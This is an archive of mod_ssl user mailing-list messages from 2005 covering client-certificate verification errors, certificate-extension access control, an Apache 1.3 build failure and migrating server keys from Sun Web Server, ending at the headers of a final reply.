Received: by master.modssl.org (Postfix, from userid 30101)
	id 1E2DE14D9AD; Fri, 29 Jul 2005 17:18:15 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web42404.mail.yahoo.com (web42404.mail.yahoo.com [66.218.93.227])
	by master.modssl.org (Postfix) with SMTP id 3810614D977
	for ; Fri, 29 Jul 2005 17:18:13 +0200 (CEST)
Received: (qmail 56553 invoked by uid 60001); 29 Jul 2005 15:17:42 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  h=Message-ID:Received:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding;
  b=MqO+B+/EsLsONaGmJYPed9SHVqaLupn02Fr992/8m8D5mYe3VuDLMVtx/Tby28EqnEOO/XhxTsAlDliJQ+CuxPXJEqYQZM/WHZsc7TMG4E+QbsI5a1rdrXzZ5A/iHTMmUzFGS/Ta84NHGgbk+1hg+ZJ1V91uCAgDB27YHU1vVzg=  ;
Message-ID: <20050729151742.56551.qmail@web42404.mail.yahoo.com>
Received: from [62.129.121.32] by web42404.mail.yahoo.com via HTTP; Fri, 29 Jul 2005 08:17:42 PDT
Date: Fri, 29 Jul 2005 08:17:42 -0700 (PDT)
From: Matt Stevenson 
Subject: RE: SSLVerifyClient fails
To: modssl-users@modssl.org
In-Reply-To: <20050729151357.6539314D977@master.modssl.org>
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Matt Stevenson 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Try using "openssl s_client ...." to connect(? arg for
options). It'll give alot of debug info.

--- Sven Löschner  wrote:

> > SSLVerifyDepth equal to 2.
> 
> Thx, i tried Depth from 1 to 10....but no effect. I
> think my certificates
> are wrong....Especially the concated one. Is there a
> way to proof these
> certificates?
> 
> Sven  
> 
>
______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)               
>    www.modssl.org
> User Support Mailing List                     
> modssl-users@modssl.org
> Automated List Manager                           
> majordomo@modssl.org
> 



		
____________________________________________________
Start your day with Yahoo! - make it your home page 
http://www.yahoo.com/r/hs 
 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 29 17:37:50 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id D247414D9BC; Fri, 29 Jul 2005 17:37:50 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from c1-2-6.rz.ruhr-uni-bochum.de (c1-2-6.rz.ruhr-uni-bochum.de [134.147.32.86])
	by master.modssl.org (Postfix) with SMTP id 9181614D9A2
	for ; Fri, 29 Jul 2005 17:37:50 +0200 (CEST)
Received: (qmail 13451 invoked by uid 281); 29 Jul 2005 15:37:49 -0000
Received: from 134.147.64.14 by c1-2-6.rz.ruhr-uni-bochum.de (envelope-from , uid 80) with qmail-scanner-1.25 
 (sophie: 3.04/2.30/3.94.  
 Clear:RC:1(134.147.64.14):. 
 Processed in 0.032314 secs); 29 Jul 2005 15:37:49 -0000
Received: from sunu007.rz.ruhr-uni-bochum.de (134.147.64.14)
  by c1-2-6.rz.ruhr-uni-bochum.de with SMTP; 29 Jul 2005 15:37:49 -0000
Received: (qmail 26382 invoked from network); 29 Jul 2005 15:37:49 -0000
Received: from i5387d186.versanet.de (HELO mainframe) (loescsbx@83.135.209.134)
  by mail.ruhr-uni-bochum.de with SMTP; 29 Jul 2005 15:37:49 -0000
From: =?iso-8859-1?Q?Sven_L=F6schner?= 
To: 
Subject: RE: SSLVerifyClient fails
Date: Fri, 29 Jul 2005 17:38:31 +0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Mailer: Microsoft Office Outlook, Build 11.0.6353
In-Reply-To: <20050729151742.56551.qmail@web42404.mail.yahoo.com>
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2527
Thread-Index: AcWUUMmRqVlXT9FeT6ybGjDcToMmhQAAk6Wg
X-Qmail-Scanner-Message-ID: <112265146970113444@c1-2-6.rz.ruhr-uni-bochum.de>
Message-Id: <20050729153750.9181614D9A2@master.modssl.org>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?iso-8859-1?Q?Sven_L=F6schner?= 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

> Try using "openssl s_client ...." to connect(? arg for 
> options). It'll give alot of debug info.

Okay, I tried "openssl s_client -connect www.test.de:443 -CAfile
/etc/ssl/UserCA/UserCAchaincert.pem -verify 3 -cert
/etc/ssl/UserCA/svencert.pem -key /etc/ssl/UserCA/svenkey.pem -reconnect
-showcerts -state -bugs"

The output is the following:

CONNECTED(00000003)
SSL_connect:before/connect initialization
SSL_connect:SSLv2/v3 write client hello A
SSL_connect:SSLv3 read server hello A
depth=0 /C=DE/ST=NRW/L=Hattingen/O=MX/OU=Demo
Server/CN=www.test.de/emailAddress=info@test.de
verify error:num=20:unable to get local issuer certificate
verify return:1
depth=0 /C=DE/ST=NRW/L=Hattingen/O=MX/OU=Demo
Server/CN=www.test.de/emailAddress=info@test.de
verify error:num=27:certificate not trusted
verify return:1
depth=0 /C=DE/ST=NRW/L=Hattingen/O=MX/OU=Demo
Server/CN=www.test.de/emailAddress=info@test.de
verify error:num=21:unable to verify the first certificate
verify return:1
SSL_connect:SSLv3 read server certificate A
SSL_connect:SSLv3 read server key exchange A
SSL_connect:SSLv3 read server certificate request A
SSL_connect:SSLv3 read server done A
SSL_connect:SSLv3 write client certificate A
SSL_connect:SSLv3 write client key exchange A
SSL_connect:SSLv3 write certificate verify A
SSL_connect:SSLv3 write change cipher spec A
SSL_connect:SSLv3 write finished A
SSL_connect:SSLv3 flush data
SSL_connect:failed in SSLv3 read finished A
22430:error:140790E5:SSL routines:SSL23_WRITE:ssl handshake
failure:s23_lib.c:226:



Sven

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug  4 09:59:47 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id CF12914D990; Thu,  4 Aug 2005 09:59:47 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from basicbox3.server-home.net (basicbox3.server-home.net [195.137.212.25])
	by master.modssl.org (Postfix) with ESMTP id A796C14D981
	for ; Thu,  4 Aug 2005 09:59:47 +0200 (CEST)
Received: from [10.10.10.74] (unknown [195.135.135.62])
	by basicbox3.server-home.net (Postfix) with ESMTP id 7E33513266E
	for ; Thu,  4 Aug 2005 09:59:47 +0200 (CEST)
Message-ID: <42F1CAF0.7000604@uzulabs.net>
Date: Thu, 04 Aug 2005 09:59:44 +0200
From: Paul Puschmann 
User-Agent: Mozilla Thunderbird 1.0.6 (X11/20050802)
X-Accept-Language: de-DE, de, en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: SSLVerifyClient fails
References: <20050729153750.9181614D9A2@master.modssl.org>
In-Reply-To: <20050729153750.9181614D9A2@master.modssl.org>
X-Enigmail-Version: 0.92.0.0
Content-Type: multipart/signed; micalg=pgp-sha1;
 protocol="application/pgp-signature";
 boundary="------------enig5F14D37EB43A87E35E9A48C1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Paul Puschmann 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is an OpenPGP/MIME signed message (RFC 2440 and 3156)
--------------enig5F14D37EB43A87E35E9A48C1
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable

Sven L=F6schner schrieb:
>>Try using "openssl s_client ...." to connect(? arg for=20
>>options). It'll give alot of debug info.
>=20
>=20
> Okay, I tried "openssl s_client -connect www.test.de:443 -CAfile
> /etc/ssl/UserCA/UserCAchaincert.pem -verify 3 -cert
> /etc/ssl/UserCA/svencert.pem -key /etc/ssl/UserCA/svenkey.pem -reconnec=
t
> -showcerts -state -bugs"
>=20
> The output is the following:
>=20
> CONNECTED(00000003)
> SSL_connect:before/connect initialization
> SSL_connect:SSLv2/v3 write client hello A
> SSL_connect:SSLv3 read server hello A
> depth=3D0 /C=3DDE/ST=3DNRW/L=3DHattingen/O=3DMX/OU=3DDemo
> Server/CN=3Dwww.test.de/emailAddress=3Dinfo@test.de
> verify error:num=3D20:unable to get local issuer certificate

Seems you don't have the required Root-CA-Certificates installed on your
webserver. (you need the root-certificate of your client-certificates)
anyone correct me if I'm wrong.

Paul
--=20
Linux-User #271918 with the Linux Counter, http://counter.li.org/


--------------enig5F14D37EB43A87E35E9A48C1
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: OpenPGP digital signature
Content-Disposition: attachment; filename="signature.asc"

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFC8cr/qErKtBWD7VQRAp0DAKCuMkxcT+xx9f5/+voXL0qvPgNomwCeMRwt
uH0ACRRbnXuUIZ9ebRB/Bmw=
=N1Pk
-----END PGP SIGNATURE-----

--------------enig5F14D37EB43A87E35E9A48C1--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug  4 11:49:03 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 3982A14D990; Thu,  4 Aug 2005 11:49:03 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from c1-2-6.rz.ruhr-uni-bochum.de (c1-2-6.rz.ruhr-uni-bochum.de [134.147.32.86])
	by master.modssl.org (Postfix) with SMTP id C604A14D981
	for ; Thu,  4 Aug 2005 11:49:02 +0200 (CEST)
Received: (qmail 6327 invoked by uid 281); 4 Aug 2005 09:49:01 -0000
Received: from 134.147.64.14 by c1-2-6.rz.ruhr-uni-bochum.de (envelope-from , uid 80) with qmail-scanner-1.25 
 (sophie: 3.04/2.30/3.94.  
 Clear:RC:1(134.147.64.14):. 
 Processed in 0.03311 secs); 04 Aug 2005 09:49:01 -0000
Received: from sunu007.rz.ruhr-uni-bochum.de (134.147.64.14)
  by c1-2-6.rz.ruhr-uni-bochum.de with SMTP; 4 Aug 2005 09:49:01 -0000
Received: (qmail 24607 invoked from network); 4 Aug 2005 09:49:01 -0000
Received: from i5387d0bc.versanet.de (HELO mainframe) (loescsbx@83.135.208.188)
  by mail.ruhr-uni-bochum.de with SMTP; 4 Aug 2005 09:49:01 -0000
From: =?iso-8859-1?Q?Sven_L=F6schner?= 
To: 
Subject: RE: SSLVerifyClient fails
Date: Thu, 4 Aug 2005 11:49:45 +0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Mailer: Microsoft Office Outlook, Build 11.0.6353
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2527
Thread-Index: AcWYypKVz+t3W+CHQliDHLBryMOKigADtzUg
In-Reply-To: <42F1CAF0.7000604@uzulabs.net>
X-Qmail-Scanner-Message-ID: <11231489417016320@c1-2-6.rz.ruhr-uni-bochum.de>
Message-Id: <20050804094902.C604A14D981@master.modssl.org>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?iso-8859-1?Q?Sven_L=F6schner?= 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Ok, a friend of mine sent me a working ca-cert with a working client
cert....but it's not working for me. I guess I will set up an Apache 1.x,
and delete the Apache2, because it makes a lot of trouble in working
correctly e.g. with openssl. I tried a lot of versions, but always errors
(OpenSSL 0.9.7f - 0.9.8, Apache 2.0.48, 2.0.54, 2.0.55-dev)


Sven

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug  8 14:26:35 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 07E0814D9BA; Mon,  8 Aug 2005 14:26:35 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from fabaglexfr.fabasoft.com (fabaglexfr.fabasoft.com [192.84.221.196])
	by master.modssl.org (Postfix) with ESMTP id A677614D974
	for ; Mon,  8 Aug 2005 14:26:34 +0200 (CEST)
Received: from EVS-FABASOFT.fabagl.fabasoft.com ([10.10.5.11]) by fabaglexfr.fabasoft.com with InterScan Messaging Security Suite; Mon, 08 Aug 2005 14:26:54 +0200
Received: from zaphod by evs-fabasoft; 08 Aug 2005 14:26:37 +0200
Subject: access restriction based on RFC3280/4.2 'Certificate Extensions'
From: "Pitrich, Karl" 
To: modssl-users@modssl.org
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
Organization: Fabasoft Research
Message-Id: <1123503997.18812.17.camel@zaphod>
Mime-Version: 1.0
X-Mailer: Ximian Evolution 1.4.6 
Date: Mon, 08 Aug 2005 14:26:37 +0200
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Pitrich, Karl" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

is it somehow possible to restrict access to 
a httpd2/mod_ssl based on the presence
of an extended attribute with a specific OID 
in the client's certificate?

i was unsuccessfull looking that up in the docs or ml-archive.


than you for any hint,

 / pit
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug  8 17:19:52 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 1B62614D9BA; Mon,  8 Aug 2005 17:19:52 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cr.toftum.org (cpe.atm2-0-76391.0x535ae692.bynxx16.customer.tele.dk [83.90.230.146])
	by master.modssl.org (Postfix) with ESMTP id 82F8B14D974
	for ; Mon,  8 Aug 2005 17:19:50 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by cr.toftum.org (Postfix) with ESMTP id 8CAEA3054F9
	for ; Mon,  8 Aug 2005 17:28:18 +0200 (CEST)
Received: from cr.toftum.org ([127.0.0.1])
 by localhost (cr [127.0.0.1]) (amavisd-new, port 10024) with ESMTP
 id 21422-07 for ;
 Mon,  8 Aug 2005 17:28:12 +0200 (CEST)
Received: by cr.toftum.org (Postfix, from userid 1000)
	id 187EA3054FE; Mon,  8 Aug 2005 17:28:12 +0200 (CEST)
Date: Mon, 8 Aug 2005 17:28:12 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: access restriction based on RFC3280/4.2 'Certificate Extensions'
Message-ID: <20050808152812.GZ25285@cr>
Mail-Followup-To: modssl-users@modssl.org
References: <1123503997.18812.17.camel@zaphod>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <1123503997.18812.17.camel@zaphod>
X-Mailer: mutt
X-Virus-Scanned: amavisd-new at toftum.dk
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Mon, Aug 08, 2005 at 02:26:37PM +0200, Pitrich, Karl wrote:
> Hi,
> 
> is it somehow possible to restrict access to 
> a httpd2/mod_ssl based on the presence
> of an extended attribute with a specific OID 
> in the client's certificate?
> 
There is some support for that in the very latest httpd dev tree - see
http://mail-archives.apache.org/mod_mbox/httpd-cvs/200507.mbox/%3c20050720164301.95859.qmail@minotaur.apache.org%3e

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug  9 04:57:30 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id DD1D114D9BC; Tue,  9 Aug 2005 04:57:30 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from christopher.medbanner.com (cobalt.physemp.com [207.177.51.226])
	by master.modssl.org (Postfix) with ESMTP id 3194114D9A4
	for ; Tue,  9 Aug 2005 04:57:29 +0200 (CEST)
Received: from localhost.localdomain ([127.0.0.1])
	by christopher.medbanner.com with esmtp (Exim 3.36 #1 (Debian))
	id 1E2KJj-0003UA-00
	for ; Mon, 08 Aug 2005 21:58:15 -0500
Message-ID: <42F81BC6.4040300@ceverett.com>
Date: Mon, 08 Aug 2005 21:58:14 -0500
From: "Christopher L. Everett" 
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.8) Gecko/20050513 Debian/1.7.8-1
X-Accept-Language: en-us
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Compile failure
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Christopher L. Everett" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

I downloaded and unpacked mm-1.3.1, openssl-0.9.8, apache_1.3.33 and
modssl-2.8.23-1.3.33.  Then I installed everything:

installed MM
------------

./configure --prefix=/usr/local
make && make test && make install

openssl-0.9.8
-------------

./config --prefix=/usr/local
make && make test && make install

apache+mod_ssl
--------------
mkdir httpd-ssl
cd httpd-ssl
cp -rl ../apache_1.3.33/ .
cp -rl ../modssl-2.8.23-1.3.33/ .
ln ../../mod_proxy_add_forward.c src/modules/extra/
cp -rl ../../gzip src/modules/
cd modssl-2.8.23-1.3.33/
./configure --with-apache=../apache_1.3.33/
cd ../apache_1.3.33/
CC="gcc" \
CFLAGS="`mm-config --cflags` -DOPENSSL_NO_KRB5" \
OPTIM="-O3 -fomit-frame-pointer -ffast-math -malign-double 
-funroll-all-loops -fno-exceptions" \
EAPI_MM=../../mm-1.3.1/ \
SSL_BASE=../../openssl-0.9.8/ \
TARGET=httpd-ssl \
./configure \
"--target=httpd-ssl" \
"--enable-module=ssl" \
"--disable-rule=SSL_COMPAT" \
"--activate-module=src/modules/extra/mod_proxy_add_forward.c" \
"--enable-module=proxy_add_forward" \
"--activate-module=src/modules/gzip/mod_gzip.c" \
"--enable-module=gzip" \
"--enable-module=proxy" \
"--enable-module=alias" \
"--enable-module=rewrite" \
"--enable-module=cgi" \
"--disable-module=info" \
"--disable-module=status" \
"--disable-module=imap" \
"--disable-module=userdir" \
"--disable-module=asis" \
"--disable-module=autoindex" \
"--with-layout=medbanner"

When I make the server, everything goes aright for a while and then I get

gcc -O3 -fomit-frame-pointer -ffast-math -malign-double 
-funroll-all-loops -fno-exceptions -DLINUX=22 -DTARGET=\"httpd-ssl\" 
-DHAVE_SET_DUMPABLE -DNO_DBM_REWRITEMAP -DMOD_SSL=208123 -DUSE_HSREGEX 
-DEAPI -DEAPI_MM -DNO_DL_NEEDED -I/usr/local/include -DOPENSSL_NO_KRB5 
`./apaci` -L/usr/src/openssl-0.9.8 -L./../../../mm-1.3.1//.libs \
      -o httpd-ssl buildmark.o modules.o modules/standard/libstandard.a 
modules/proxy/libproxy.a modules/ssl/libssl.a modules/extra/libextra.a 
modules/gzip/libgzip.a main/libmain.a ./os/unix/libos.a ap/libap.a 
regex/libregex.a   -lm -lcrypt  -lssl -lcrypto -lmm -lexpat
modules/proxy/libproxy.a(proxy_cache.o)(.text+0x1fd4): In function 
`ap_proxy_cache_update':
: warning: the use of `mktemp' is dangerous, better use `mkstemp'
/usr/src/openssl-0.9.8/libcrypto.a(dso_dlfcn.o)(.text+0x45): In function 
`dlfcn_load':
: undefined reference to `dlopen'
/usr/src/openssl-0.9.8/libcrypto.a(dso_dlfcn.o)(.text+0xc4): In function 
`dlfcn_load':
: undefined reference to `dlclose'
/usr/src/openssl-0.9.8/libcrypto.a(dso_dlfcn.o)(.text+0x102): In 
function `dlfcn_load':
: undefined reference to `dlerror'
/usr/src/openssl-0.9.8/libcrypto.a(dso_dlfcn.o)(.text+0x1ad): In 
function `dlfcn_bind_var':
: undefined reference to `dlsym'
/usr/src/openssl-0.9.8/libcrypto.a(dso_dlfcn.o)(.text+0x1f2): In 
function `dlfcn_bind_var':
: undefined reference to `dlerror'
/usr/src/openssl-0.9.8/libcrypto.a(dso_dlfcn.o)(.text+0x2ed): In 
function `dlfcn_bind_func':
: undefined reference to `dlsym'
/usr/src/openssl-0.9.8/libcrypto.a(dso_dlfcn.o)(.text+0x337): In 
function `dlfcn_bind_func':
: undefined reference to `dlerror'
/usr/src/openssl-0.9.8/libcrypto.a(dso_dlfcn.o)(.text+0x68a): In 
function `dlfcn_unload':
: undefined reference to `dlclose'
collect2: ld returned 1 exit status
make[2]: *** [target_static] Error 1
make[2]: Leaving directory `/usr/src/httpd-ssl/apache_1.3.33/src'
make[1]: *** [build-std] Error 2
make[1]: Leaving directory `/usr/src/httpd-ssl/apache_1.3.33'
make: *** [build] Error 2

I'm on a Debian stable box, using GCC 3.3, and although you don't see
it, there's a "-march=athlon-xp" compiler directive in there as well,
becuase I have the Debian "pentium-builder" package installed as well.

Got any clues for me?

-- 
Christopher L. Everett

Chief Technology Officer                               www.medbanner.com
MedBanner, Inc.                                          www.physemp.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug  9 20:45:45 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id A39A214D9BD; Tue,  9 Aug 2005 20:45:45 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from wproxy.gmail.com (wproxy.gmail.com [64.233.184.193])
	by master.modssl.org (Postfix) with ESMTP id 452FC14D98A
	for ; Tue,  9 Aug 2005 20:45:44 +0200 (CEST)
Received: by wproxy.gmail.com with SMTP id i2so506526wra
        for ; Tue, 09 Aug 2005 11:45:44 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition;
        b=OPcHKF8JWXomtRw0EkKkm0zK8Sz2K7SsqFKrenv5ks5vYjVJb1biIEbnrzSt6YDuCm576a00Y9NTuYb+UqIkuMWV1AZvI0Fs+MheudI8oKbb4mfDf+rgW0IPCFVzfoXE5Mu1DsavoOvE4pUSjXsB7YengBiu1G+nvaHOsX8VnxA=
Received: by 10.54.44.58 with SMTP id r58mr1199876wrr;
        Tue, 09 Aug 2005 11:45:43 -0700 (PDT)
Received: by 10.54.2.79 with HTTP; Tue, 9 Aug 2005 11:45:43 -0700 (PDT)
Message-ID: 
Date: Tue, 9 Aug 2005 11:45:43 -0700
From: SB 
To: modssl-users@modssl.org
Subject: Migrating cert from Sun Web Server
Mime-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: SB 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I've already paid for a few Verisign certs (that were requested from
and installed on Sun Web Server aka SWS aka ONE aka iPlanet) and now
we are migrating from SWS to Apache and mod_ssl. I would like to reuse
the certs but they (and the keys) use some weird db format. I have the
certs in my email somewhere still so all I need is the keys. Anyone
know how I can extract the key from the db file or elsewhere for use
with mod_ssl and Apache2?

I've already looked in the docs[1] and googled a bit but so far
nothing. Any help is greatly appreciated!

SB
-----
[1] http://docs.sun.com/source/817-1831-10/agcert.html#wp1004981
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug  9 21:21:34 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 0D83A14D9BD; Tue,  9 Aug 2005 21:21:34 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from acrux.ligo.caltech.edu (acrux.ligo.caltech.edu [131.215.115.14])
	by master.modssl.org (Postfix) with ESMTP id 83CA814D98A
	for ; Tue,  9 Aug 2005 21:21:33 +0200 (CEST)
Received: from localhost.localdomain (tarazed [131.215.115.31])
	by acrux.ligo.caltech.edu (8.12.11/8.12.11) with ESMTP id j79JKwpM005607
	(version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NOT)
	for ; Tue, 9 Aug 2005 12:20:58 -0700 (PDT)
Received: (from pehrens@localhost)
	by localhost.localdomain (8.13.4/8.13.4/Submit) id j79JLQb7014313
	for modssl-users@modssl.org; Tue, 9 Aug 2005 12:21:26 -0700
Date: Tue, 9 Aug 2005 12:21:26 -0700
From: Phil Ehrens 
To: modssl-users@modssl.org
Subject: Re: Migrating cert from Sun Web Server
Message-ID: <20050809192126.GB13813@ligo.caltech.edu>
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.4.2.1i
Shoe-Size: 9-1/2
X-Spam-Score: undef - Domain Whitelisted (ligo.caltech.edu: )
X-Canit-Stats-ID: 2135304 - bc7fa7349503
X-Scanned-By: CanIt (www . roaringpenguin . com) on 131.215.115.14
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Phil Ehrens 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

SB wrote:
> I've already paid for a few Verisign certs (that were requested from
> and installed on Sun Web Server aka SWS aka ONE aka iPlanet) and now
> we are migrating from SWS to Apache and mod_ssl. I would like to reuse
> the certs but they (and the keys) use some weird db format. I have the
> certs in my email somewhere still so all I need is the keys. Anyone
> know how I can extract the key from the db file or elsewhere for use
> with mod_ssl and Apache2?
> 
> I've already looked in the docs[1] and googled a bit but so far
> nothing. Any help is greatly appreciated!

Look here (search for pk12util):

http://docs.sun.com/source/816-5682-10/esecurty.htm

-- 
Phil Ehrens | Fun stuff:
The LIGO Laboratory, MS 18-34         | http://www.ralphmag.org
California Institute of Technology    | http://www.yellow5.com
1200 East California Blvd.            | http://www.total.net/~fishnet/
Pasadena, CA 91125 USA                | http://slashdot.org
Phone:(626)395-8518 Fax:(626)793-9744 | http://kame56.homepage.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug  9 21:50:09 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id EB6A614D9BE; Tue,  9 Aug 2005 21:50:09 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from wproxy.gmail.com (wproxy.gmail.com [64.233.184.192])
	by master.modssl.org (Postfix) with ESMTP id 672B614D98A
	for ; Tue,  9 Aug 2005 21:50:08 +0200 (CEST)
Received: by wproxy.gmail.com with SMTP id i2so520971wra
        for ; Tue, 09 Aug 2005 12:50:08 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        b=T6h5JcW21SIaPZdUO5wytXAPyVDNT/p6IjMk3/4NAWiptM//atLdlT1tCgDFF6zarkABKdBUce2k8lcqFV8uMoiiw2kPrE9c+p4v1ZiMLyRbm19zXqdQBi++Tm168fIXoOo6rIVdEm1995BinBvvWFJsTNg8C5/O4QxosbtUN6o=
Received: by 10.54.44.58 with SMTP id r58mr1236429wrr;
        Tue, 09 Aug 2005 12:50:08 -0700 (PDT)
Received: by 10.54.2.79 with HTTP; Tue, 9 Aug 2005 12:50:07 -0700 (PDT)
Message-ID: 
Date: Tue, 9 Aug 2005 12:50:08 -0700
From: SB 
To: modssl-users@modssl.org
Subject: Re: Migrating cert from Sun Web Server
In-Reply-To: <20050809192126.GB13813@ligo.caltech.edu>
